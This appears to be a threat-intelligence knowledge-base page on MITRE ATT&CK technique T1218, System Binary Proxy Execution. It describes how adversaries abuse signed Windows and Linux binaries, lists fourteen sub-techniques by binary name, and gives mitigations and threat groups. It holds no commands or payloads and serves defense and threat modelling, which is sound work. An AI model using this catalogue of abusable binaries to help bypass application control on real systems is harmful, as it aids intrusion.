Description
Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system.(Citation: LOLBAS Project) Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands.
Similarly, on Linux systems adversaries may abuse trusted binaries such as split to proxy execution of malicious commands.(Citation: split man page)(Citation: GTFO split)
Platforms
Sub-Techniques (14)
Compiled HTML File
T1218.002Control Panel
T1218.003CMSTP
T1218.004InstallUtil
T1218.005Mshta
T1218.007Msiexec
T1218.008Odbcconf
T1218.009Regsvcs/Regasm
T1218.010Regsvr32
T1218.011Rundll32
T1218.012Verclsid
T1218.013Mavinject
T1218.014MMC
T1218.015Electron Applications
Mitigations (6)
Exploit ProtectionM1050
Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block methods of using using trusted binaries to bypass application control.
Filter Network TrafficM1037
Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.
Privileged Account ManagementM1026
Restrict execution of particularly vulnerable binaries to privileged accounts or groups that need to use it to lessen the opportunities for malicious usage.
Execution PreventionM1038
Consider using application control to prevent execution of binaries that are susceptible to abuse and not required for a given system or network.
Disable or Remove Feature or ProgramM1042
Many native binaries may not be necessary within a given environment.
Restrict Web-Based ContentM1021
Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.
Threat Groups (2)
| ID | Group | Context |
|---|---|---|
| G0032 | Lazarus Group | [Lazarus Group](https://attack.mitre.org/groups/G0032) lnk files used for persistence have abused the Windows Update Client (<code>wuauclt.exe</code>)... |
| G1017 | Volt Typhoon | [Volt Typhoon](https://attack.mitre.org/groups/G1017) has used native tools and processes including living off the land binaries or “LOLBins" to main... |
References
- GTFOBins. (2020, November 13). split. Retrieved April 18, 2022.
- Oddvar Moe et al. (2022, February). Living Off The Land Binaries, Scripts and Libraries. Retrieved March 7, 2022.
- Torbjorn Granlund, Richard M. Stallman. (2020, March null). split(1) — Linux manual page. Retrieved March 25, 2022.
Frequently Asked Questions
What is T1218 (System Binary Proxy Execution)?
T1218 is a MITRE ATT&CK technique named 'System Binary Proxy Execution'. It belongs to the Stealth tactic(s). Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microso...
How can T1218 be detected?
Detection of T1218 (System Binary Proxy Execution) typically involves monitoring system logs, network traffic, and endpoint telemetry. Use SIEM rules, EDR solutions, and behavioral analytics to identify suspicious activity associated with this technique.
What mitigations exist for T1218?
There are 6 documented mitigations for T1218. Key mitigations include: Exploit Protection, Filter Network Traffic, Privileged Account Management, Execution Prevention, Disable or Remove Feature or Program.
Which threat groups use T1218?
Known threat groups using T1218 include: Lazarus Group, Volt Typhoon.